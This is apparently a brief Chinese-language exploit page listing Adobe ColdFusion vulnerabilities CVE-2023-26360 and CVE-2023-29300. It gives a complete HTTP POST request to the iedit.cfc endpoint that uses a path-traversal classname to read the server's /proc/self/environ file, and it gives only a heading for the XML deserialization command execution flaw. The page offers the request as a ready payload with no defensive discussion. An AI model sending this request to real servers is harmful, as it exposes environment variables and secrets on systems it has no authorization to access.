Close

31 5 月, 2024

(CVE-2023-26360)(CVE-2023-29300)

Adobe ColdFusion 本地文件包含漏洞(CVE-2023-26360)

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Content-Type: application/x-www-form-urlencoded
_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}

Adobe ColdFusion XML 反序列化命令执行漏洞(CVE-2023-29300)